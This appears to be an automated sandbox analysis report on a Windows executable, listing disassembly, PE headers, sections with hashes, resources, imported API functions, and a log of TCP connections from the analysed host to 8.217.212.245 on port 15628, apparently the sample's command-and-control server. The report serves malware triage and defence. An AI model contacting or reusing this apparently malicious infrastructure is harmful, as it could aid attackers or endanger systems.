                                                                                                                                                                                                  je 00007F8308DE9DC3h
                                                                                                                                                                                                  nop
                                                                                                                                                                                                  nop
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov dword ptr [ecx], edx
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  add ecx, 08h
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  jne 00007F8308DE9DA6h
                                                                                                                                                                                                  dec ebp
                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                  je 00007F8308DE9DBCh
                                                                                                                                                                                                  mov byte ptr [ecx], dl
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  inc ecx
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  jne 00007F8308DE9DA8h
                                                                                                                                                                                                  ret
                                                                                                                                                                                                  nop dword ptr [eax+00h]
                                                                                                                                                                                                  nop
                                                                                                                                                                                                  nop
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  cmp ecx, 00001C00h
                                                                                                                                                                                                  jnc 00007F8308DE9DE2h
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov dword ptr [ecx], edx
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov dword ptr [ecx+08h], edx
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov dword ptr [ecx+10h], edx
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  add ecx, 40h
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov dword ptr [ecx-28h], edx
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov dword ptr [ecx-20h], edx
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  dec eax

                                                                                                                                                                                                  Rich Headers

                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                  • [ C ] VS2005 build 50727
                                                                                                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                  • [ASM] VS2008 SP1 build 30729
                                                                                                                                                                                                  • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                                  • [RES] VS2008 build 21022
                                                                                                                                                                                                  • [LNK] VS2008 SP1 build 30729

                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xad8b00x104.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1f8e0000x12d30.rsrc
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1f840000x96d8.pdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x810000xf40.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                  Sections

                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                  .text0x10000x7f7c00x7f800a7d57b7d9e7b1994ec5470ae7229cd2dFalse0.4946997549019608zlib compressed data6.311975084207791IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .rdata0x810000x2f9480x2fa00f46b3ca44f6c1aea7e59564f52494ddcFalse0.2865506069553806data4.618225905174831IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .data0xb10000x1ed29700x1ecc400f39d5bd6306e5ec255a4cc1d60976d0cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                  .pdata0x1f840000x96d80x9800750c5041957e88c08b0d0d51b62ce8b5False0.4538445723684211data5.746289077799479IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .rsrc0x1f8e0000x12d300x12e00bdb6276c500950cd7f39c21191b247d0False0.3001215852649007data4.701905284524863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                  Resources

                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                  RT_CURSOR0x1f8f6180x134dataEnglishUnited States0.39935064935064934
                                                                                                                                                                                                  RT_CURSOR0x1f8f74c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                                                                                                                                                  RT_CURSOR0x1f8f8800xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                                                                                                                                                                                                  RT_CURSOR0x1f8f9340x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.36363636363636365
                                                                                                                                                                                                  RT_CURSOR0x1f8fa680x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.35714285714285715
                                                                                                                                                                                                  RT_CURSOR0x1f8fb9c0x134dataEnglishUnited States0.37337662337662336
                                                                                                                                                                                                  RT_CURSOR0x1f8fcd00x134dataEnglishUnited States0.37662337662337664
                                                                                                                                                                                                  RT_CURSOR0x1f8fe040x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                                                                                                  RT_CURSOR0x1f8ff380x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.37662337662337664
                                                                                                                                                                                                  RT_CURSOR0x1f9006c0x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                                                                                                  RT_CURSOR0x1f901a00x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                  RT_CURSOR0x1f902d40x134dataEnglishUnited States0.44155844155844154
                                                                                                                                                                                                  RT_CURSOR0x1f904080x134dataEnglishUnited States0.4155844155844156
                                                                                                                                                                                                  RT_CURSOR0x1f9053c0x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5422077922077922
                                                                                                                                                                                                  RT_CURSOR0x1f906700x134dataEnglishUnited States0.2662337662337662
                                                                                                                                                                                                  RT_CURSOR0x1f907a40x134dataEnglishUnited States0.2824675324675325
                                                                                                                                                                                                  RT_CURSOR0x1f908d80x134dataEnglishUnited States0.3246753246753247
                                                                                                                                                                                                  RT_CURSOR0x1f90a0c0x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4025974025974026
                                                                                                                                                                                                  RT_CURSOR0x1f90b400xb4dataEnglishUnited States0.55
                                                                                                                                                                                                  RT_BITMAP0x1f90bf40x1a48Device independent bitmap graphic, 550 x 24 x 4, image size 6624EnglishUnited States0.20228894173602854
                                                                                                                                                                                                  RT_BITMAP0x1f9263c0x1c68Device independent bitmap graphic, 448 x 32 x 4, image size 7168EnglishUnited States0.3363586358635864
                                                                                                                                                                                                  RT_BITMAP0x1f942a40x2468Device independent bitmap graphic, 576 x 32 x 4, image size 9216EnglishUnited States0.3572961373390558
                                                                                                                                                                                                  RT_BITMAP0x1f9670c0x768Device independent bitmap graphic, 224 x 16 x 4, image size 1792EnglishUnited States0.15664556962025317
                                                                                                                                                                                                  RT_BITMAP0x1f96e740xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                                                                                                                                                                                                  RT_BITMAP0x1f96f2c0x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                                                                                                                                                                                                  RT_ICON0x1f970700x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 7296EnglishUnited States0.770174482006543
                                                                                                                                                                                                  RT_ICON0x1f98d180x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.37768817204301075
                                                                                                                                                                                                  RT_ICON0x1f990000x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
                                                                                                                                                                                                  RT_MENU0x1f991280x12edataEnglishUnited States0.5827814569536424
                                                                                                                                                                                                  RT_MENU0x1f992580xd48dataEnglishUnited States0.3552941176470588
                                                                                                                                                                                                  RT_MENU0x1f99fa00x64Matlab v4 mat-file (little endian) o, numeric, rows 7340176, columns 7340143EnglishUnited States0.84
                                                                                                                                                                                                  RT_DIALOG0x1f9a0040x33cdataEnglishUnited States0.5169082125603864
                                                                                                                                                                                                  RT_DIALOG0x1f9a3400x3badataEnglishUnited States0.46540880503144655
                                                                                                                                                                                                  RT_DIALOG0x1f9a6fc0x1d6dataEnglishUnited States0.5574468085106383
                                                                                                                                                                                                  RT_DIALOG0x1f9a8d40x1cadataEnglishUnited States0.5589519650655022
                                                                                                                                                                                                  RT_DIALOG0x1f9aaa00x222dataEnglishUnited States0.5183150183150184
                                                                                                                                                                                                  RT_DIALOG0x1f9acc40x538dataEnglishUnited States0.3787425149700599
                                                                                                                                                                                                  RT_DIALOG0x1f9b1fc0x540dataEnglishUnited States0.3757440476190476
                                                                                                                                                                                                  RT_DIALOG0x1f9b73c0x554dataEnglishUnited States0.3951612903225806
                                                                                                                                                                                                  RT_DIALOG0x1f9bc900x550dataEnglishUnited States0.3963235294117647
                                                                                                                                                                                                  RT_DIALOG0x1f9c1e00x366dataEnglishUnited States0.46436781609195404
                                                                                                                                                                                                  RT_DIALOG0x1f9c5480x1c6dataEnglishUnited States0.5969162995594713
                                                                                                                                                                                                  RT_DIALOG0x1f9c7100x2a0dataEnglishUnited States0.4955357142857143
                                                                                                                                                                                                  RT_DIALOG0x1f9c9b00xe8dataEnglishUnited States0.6336206896551724
                                                                                                                                                                                                  RT_DIALOG0x1f9ca980x1a2dataEnglishUnited States0.4688995215311005
                                                                                                                                                                                                  RT_DIALOG0x1f9cc3c0x15adataEnglishUnited States0.5057803468208093
                                                                                                                                                                                                  RT_DIALOG0x1f9cd980x34dataEnglishUnited States0.9038461538461539
                                                                                                                                                                                                  RT_STRING0x1f9cdcc0xccdataEnglishUnited States0.39215686274509803
                                                                                                                                                                                                  RT_STRING0x1f9ce980x4edataEnglishUnited States0.6410256410256411
                                                                                                                                                                                                  RT_STRING0x1f9cee80xd6dataEnglishUnited States0.5233644859813084
                                                                                                                                                                                                  RT_STRING0x1f9cfc00xd0dataEnglishUnited States0.6346153846153846
                                                                                                                                                                                                  RT_STRING0x1f9d0900x4bedataEnglishUnited States0.30065897858319607
                                                                                                                                                                                                  RT_STRING0x1f9d5500x44adataEnglishUnited States0.27140255009107467
                                                                                                                                                                                                  RT_STRING0x1f9d99c0x150Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0EnglishUnited States0.4851190476190476
                                                                                                                                                                                                  RT_STRING0x1f9daec0xa0dataEnglishUnited States0.55
                                                                                                                                                                                                  RT_STRING0x1f9db8c0x150dataEnglishUnited States0.2976190476190476
                                                                                                                                                                                                  RT_STRING0x1f9dcdc0x62dataEnglishUnited States0.3469387755102041
                                                                                                                                                                                                  RT_STRING0x1f9dd400x3adataEnglishUnited States0.6551724137931034
                                                                                                                                                                                                  RT_STRING0x1f9dd7c0x2aedataEnglishUnited States0.3556851311953353
                                                                                                                                                                                                  RT_STRING0x1f9e02c0x260dataEnglishUnited States0.0805921052631579
                                                                                                                                                                                                  RT_STRING0x1f9e28c0x330dataEnglishUnited States0.3492647058823529
                                                                                                                                                                                                  RT_STRING0x1f9e5bc0x27cdataEnglishUnited States0.33176100628930816
                                                                                                                                                                                                  RT_STRING0x1f9e8380x106dataEnglishUnited States0.5763358778625954
                                                                                                                                                                                                  RT_STRING0x1f9e9400xdadataEnglishUnited States0.43119266055045874
                                                                                                                                                                                                  RT_STRING0x1f9ea1c0x46dataEnglishUnited States0.7428571428571429
                                                                                                                                                                                                  RT_STRING0x1f9ea640xc6dataEnglishUnited States0.41919191919191917
                                                                                                                                                                                                  RT_STRING0x1f9eb2c0x1f8dataEnglishUnited States0.36706349206349204
                                                                                                                                                                                                  RT_STRING0x1f9ed240xaedataEnglishUnited States0.5689655172413793
                                                                                                                                                                                                  RT_STRING0x1f9edd40xd0StarOffice Gallery theme p, 1929408256 objects, 1st pEnglishUnited States0.6394230769230769
                                                                                                                                                                                                  RT_STRING0x1f9eea40x2adataEnglishUnited States0.5476190476190477
                                                                                                                                                                                                  RT_STRING0x1f9eed00x184dataEnglishUnited States0.48711340206185566
                                                                                                                                                                                                  RT_STRING0x1f9f0540x124dataEnglishUnited States0.4897260273972603
                                                                                                                                                                                                  RT_STRING0x1f9f1780x4e6dataEnglishUnited States0.37719298245614036
                                                                                                                                                                                                  RT_STRING0x1f9f6600x264dataEnglishUnited States0.3333333333333333
                                                                                                                                                                                                  RT_STRING0x1f9f8c40x2dadataEnglishUnited States0.3698630136986301
                                                                                                                                                                                                  RT_STRING0x1f9fba00x8adataEnglishUnited States0.6594202898550725
                                                                                                                                                                                                  RT_STRING0x1f9fc2c0xacdataEnglishUnited States0.45348837209302323
                                                                                                                                                                                                  RT_STRING0x1f9fcd80xdedataEnglishUnited States0.536036036036036
                                                                                                                                                                                                  RT_STRING0x1f9fdb80x4a8dataEnglishUnited States0.3221476510067114
                                                                                                                                                                                                  RT_STRING0x1fa02600x228dataEnglishUnited States0.4003623188405797
                                                                                                                                                                                                  RT_STRING0x1fa04880x2cdataEnglishUnited States0.5227272727272727
                                                                                                                                                                                                  RT_STRING0x1fa04b40x42dataEnglishUnited States0.6060606060606061
                                                                                                                                                                                                  RT_ACCELERATOR0x1fa04f80x88dataEnglishUnited States0.6911764705882353
                                                                                                                                                                                                  RT_ACCELERATOR0x1fa05800x230dataEnglishUnited States0.5285714285714286
                                                                                                                                                                                                  RT_ACCELERATOR0x1fa07b00x18dataEnglishUnited States1.2083333333333333
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa07c80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa07dc0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08000x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa084c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa089c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08b00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08c40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08ec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa09000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa09140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa09280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_ICON0x1fa093c0x14dataEnglishUnited States1.15
                                                                                                                                                                                                  RT_GROUP_ICON0x1fa09500x22dataEnglishUnited States1.0294117647058822
                                                                                                                                                                                                  RT_VERSION0x1fa09740xdcdataEnglishUnited States0.6590909090909091
                                                                                                                                                                                                  RT_MANIFEST0x1fa0a500x165ASCII text, with CRLF line terminatorsEnglishUnited States0.5434173669467787
                                                                                                                                                                                                  None0x1fa0bb80x64SysEx File - OctavePlateauEnglishUnited States0.79
                                                                                                                                                                                                  None0x1fa0c1c0x71dataEnglishUnited States0.45132743362831856
                                                                                                                                                                                                  None0x1fa0c900x40dataEnglishUnited States1.0625
                                                                                                                                                                                                  None0x1fa0cd00x2adataEnglishUnited States1.0952380952380953
                                                                                                                                                                                                  None0x1fa0cfc0x34dataEnglishUnited States1.0576923076923077

                                                                                                                                                                                                  Imports

                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                  KERNEL32.dllIsDebuggerPresent, RtlVirtualUnwind, RtlCaptureContext, GetACP, IsValidCodePage, EncodePointer, DecodePointer, FlsGetValue, FlsSetValue, FlsFree, FlsAlloc, GetStdHandle, HeapSetInformation, HeapCreate, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, SetUnhandledExceptionFilter, SetHandleCount, GetFileType, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetTimeZoneInformation, GetConsoleCP, GetConsoleMode, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CompareStringW, SetEnvironmentVariableA, UnhandledExceptionFilter, TerminateProcess, HeapSize, HeapQueryInformation, ExitProcess, Sleep, RtlPcToFileHeader, RaiseException, RtlUnwindEx, RtlLookupFunctionEntry, GetStartupInfoA, GetCommandLineA, HeapReAlloc, HeapAlloc, HeapFree, GetFileSizeEx, LocalFileTimeToFileTime, GetFileAttributesExA, SetErrorMode, GetCurrentDirectoryA, FileTimeToLocalFileTime, GetOEMCP, GetCPInfo, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, GlobalHandle, GlobalReAlloc, TlsAlloc, InitializeCriticalSection, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, GetModuleHandleW, SystemTimeToFileTime, FileTimeToSystemTime, GlobalFlags, GetDiskFreeSpaceA, GetFileTime, SetFileTime, GetShortPathNameA, GetFullPathNameA, GetVolumeInformationA, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, lstrcmpiA, GetThreadLocale, GetStringTypeExA, GetCurrentThread, ConvertDefaultLocale, EnumResourceLanguagesA, GetLocaleInfoA, GetCurrentProcessId, lstrcmpA, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, GetModuleFileNameW, GetProfileIntA, GetTickCount, GetCurrentThreadId, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, CompareStringA, FreeLibrary, lstrcmpW, GetVersionExA, CopyFileA, GlobalSize, FormatMessageA, LocalFree, lstrlenW, MultiByteToWideChar, GlobalFree, FreeResource, GetModuleFileNameA, lstrcpynA, GlobalAlloc, MulDiv, GetProcAddress, GetModuleHandleA, LoadLibraryA, GetLastError, SetLastError, FindClose, MoveFileA, DeleteFileA, FindFirstFileA, WriteFile, GetTempFileNameA, lstrcatA, lstrcpyA, CloseHandle, ReadFile, CreateFileA, GetFileAttributesA, lstrlenA, GlobalUnlock, GlobalLock, FindResourceA, LoadResource, LockResource, SizeofResource, GetEnvironmentStringsW, WideCharToMultiByte
                                                                                                                                                                                                  USER32.dllCopyAcceleratorTableA, CreateMenu, PostThreadMessageA, GetTabbedTextExtentA, GetDCEx, LockWindowUpdate, DestroyIcon, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, RegisterWindowMessageA, LoadIconA, SendDlgItemMessageA, WinHelpA, IsChild, GetCapture, SetWindowsHookExA, CallNextHookEx, GetClassLongA, GetClassNameA, GetClassLongPtrA, SetPropA, GetPropA, RemovePropA, GetFocus, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, GetLastActivePopup, DispatchMessageA, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, GetWindowLongPtrA, SetWindowLongPtrA, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, PeekMessageA, MapWindowPoints, ScrollWindow, TrackPopupMenu, SetMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, IsWindowVisible, PostMessageA, MessageBoxA, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, EqualRect, SetParent, SetScrollInfo, CopyRect, GetDlgCtrlID, PtInRect, DefWindowProcA, CallWindowProcA, GetMenu, SetWindowLongA, SetWindowPos, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, GetWindowRect, GetSystemMetrics, GetWindow, GetMenuState, GetMenuStringA, AppendMenuA, InsertMenuA, GetMenuItemID, GetMenuItemCount, GetSubMenu, RemoveMenu, GetDesktopWindow, GetActiveWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, GetWindowLongA, IsWindowEnabled, GetParent, GetNextDlgTabItem, EndDialog, ShowWindow, GetClipboardData, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, IsClipboardFormatAvailable, SetTimer, SetCapture, GetKeyState, TranslateAcceleratorA, LoadAcceleratorsA, KillTimer, ReleaseCapture, LoadCursorA, SetCursor, ScreenToClient, SendMessageA, EnableWindow, GetAsyncKeyState, GetSystemMenu, DeleteMenu, GetCursorPos, EnableScrollBar, GetDlgItem, ReleaseDC, GetDC, InvalidateRect, IsWindow, OffsetRect, GetSysColor, HideCaret, ShowCaret, SetCaretPos, CreateCaret, UpdateWindow, GetClientRect, SetWindowRgn, DrawIcon, UnregisterClassA, GetMenuItemInfoA, GetSysColorBrush, ShowOwnedPopups, CharUpperA, GetMessageA, TranslateMessage, ValidateRect, RegisterClipboardFormatA, GetScrollInfo, PostQuitMessage, WindowFromPoint, IsZoomed, TranslateMDISysAccel, DrawMenuBar, DefMDIChildProcA, DefFrameProcA, IsRectEmpty, SetCursorPos, RedrawWindow, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, DestroyCursor, SetRect, ReuseDDElParam, LoadMenuA, DestroyMenu, GetWindowThreadProcessId, InsertMenuItemA, CreatePopupMenu, SetRectEmpty, BringWindowToTop, InflateRect, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapA, ModifyMenuA, EnableMenuItem, DeferWindowPos, CheckMenuItem, UnpackDDElParam
                                                                                                                                                                                                  GDI32.dllDeleteDC, CreatePen, GetViewportOrgEx, Rectangle, PatBlt, GetStockObject, ExtTextOutA, CreateRectRgn, CreateRectRgnIndirect, SetRectRgn, CombineRgn, GetMapMode, DeleteObject, CreatePatternBrush, SaveDC, RestoreDC, SetBkMode, SetPolyFillMode, SetROP2, SetStretchBltMode, SetMapMode, ExcludeClipRect, IntersectClipRect, LineTo, MoveToEx, SetTextAlign, SelectClipRgn, GetViewportExtEx, GetWindowExtEx, GetPixel, PtVisible, RectVisible, TextOutA, Escape, EndDoc, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, GetCurrentPositionEx, CreateSolidBrush, GetTextMetricsA, GetCharWidthA, CreateFontA, StretchDIBits, GetBkColor, CreateEllipticRgn, LPtoDP, Ellipse, GetNearestColor, GetBkMode, GetPolyFillMode, GetROP2, GetStretchBltMode, GetTextColor, GetTextAlign, GetTextFaceA, GetTextExtentPointA, GetWindowOrgEx, SetAbortProc, AbortDoc, EndPage, StartPage, StartDocA, DPtoLP, CreateBitmap, SetBkColor, SetTextColor, GetClipBox, CreateDCA, CopyMetaFileA, GetDeviceCaps, GetObjectA, SelectObject, CreateCompatibleDC, CreateFontIndirectA, BitBlt, CreateCompatibleBitmap, GetTextExtentPoint32A
                                                                                                                                                                                                  COMDLG32.dllGetFileTitleA
                                                                                                                                                                                                  WINSPOOL.DRVDocumentPropertiesA, OpenPrinterA, GetJobA, ClosePrinter
                                                                                                                                                                                                  ADVAPI32.dllGetFileSecurityA, SetFileSecurityA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegDeleteValueA, RegSetValueExA, RegQueryValueExA, RegCreateKeyExA, RegSetValueA, RegCloseKey, RegQueryValueA, RegOpenKeyExA, RegCreateKeyA
                                                                                                                                                                                                  SHELL32.dllExtractIconA, DragAcceptFiles, ShellExecuteA, DragFinish, DragQueryFileA, SHGetFileInfoA, SHGetSpecialFolderPathA
                                                                                                                                                                                                  SHLWAPI.dllPathFindFileNameA, PathStripToRootA, PathIsUNCA, PathFindExtensionA, PathRemoveFileSpecW
                                                                                                                                                                                                  oledlg.dll
                                                                                                                                                                                                  ole32.dllOleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleTranslateAccelerator, CoInitializeEx, CoUninitialize, CreateStreamOnHGlobal, CoCreateInstance, OleInitialize, CoFreeUnusedLibraries, OleUninitialize, DoDragDrop, OleFlushClipboard, OleIsCurrentClipboard, OleGetClipboard, RevokeDragDrop, CoLockObjectExternal, RegisterDragDrop, OleDuplicateData, CoTaskMemAlloc, ReleaseStgMedium, CoTaskMemFree, CoRegisterMessageFilter, CoRevokeClassObject, IsAccelerator
                                                                                                                                                                                                  OLEAUT32.dllVariantClear, VariantChangeType, VariantInit, SysAllocStringLen
                                                                                                                                                                                                  OLEACC.dllLresultFromObject, CreateStdAccessibleObject

                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Dec 29, 2024 16:14:33.437800884 CET4973015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:33.558747053 CET15628497308.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:14:33.559010983 CET4973015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:33.560028076 CET4973015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:33.680885077 CET15628497308.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:14:36.202414036 CET15628497308.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:14:36.202721119 CET4973015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:36.202721119 CET4973015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:36.323865891 CET15628497308.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:14:40.794945002 CET4975015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:40.915832043 CET15628497508.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:14:40.916062117 CET4975015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:40.930923939 CET4975015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:41.051733017 CET15628497508.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:14:43.536761045 CET15628497508.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:14:43.536861897 CET4975015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:43.536942959 CET4975015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:43.657828093 CET15628497508.217.212.245192.168.2.6
